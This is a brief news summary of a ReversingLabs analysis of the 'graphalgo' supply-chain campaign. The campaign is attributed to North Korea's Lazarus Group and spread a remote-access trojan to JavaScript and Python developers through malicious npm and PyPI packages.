Inside the fake crypto developer recruitment hack

ReversingLabs published a technical analysis of an active supply‑chain campaign called "graphalgo," attributed to the North Korean Lazarus Group, which distributed a remote‑access trojan via malicious npm and PyPI packages (≈192 packages). The packages used staged encrypted payloads, decryption keys derived from constructor arguments, GitHub-hosted artifacts to reveal C2 endpoints, and cleanup routines to remove evidence; the campaign targets JavaScript and Python developers and remains ongoing.